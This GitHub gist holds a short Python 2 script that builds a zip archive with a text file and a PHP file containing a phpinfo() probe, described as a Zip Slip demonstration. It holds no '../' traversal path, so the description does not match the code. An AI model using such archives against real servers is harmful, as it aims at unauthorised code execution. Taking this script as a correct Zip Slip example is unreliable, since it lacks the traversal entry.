Skip to content

Instantly share code, notes, and snippets.

@amriunix

amriunix/zipper.py

Created April 6, 2020 11:54
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save amriunix/b180561b84b52bb16deed6834b027307 to your computer and use it in GitHub Desktop.
Save amriunix/b180561b84b52bb16deed6834b027307 to your computer and use it in GitHub Desktop.
Download ZIP
Python script to demonstrate the Zip Slip
Raw
zipper.py
#!/usr/bin/python
import zipfile
from cStringIO import StringIO
def _build_zip():
f = StringIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('folder/file.txt', 'This is just a text file!')
z.writestr('code.php', '<?php phpinfo(); ?>')
z.close()
zip = open('zipper.zip','wb')
zip.write(f.getvalue())
zip.close()
_build_zip()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment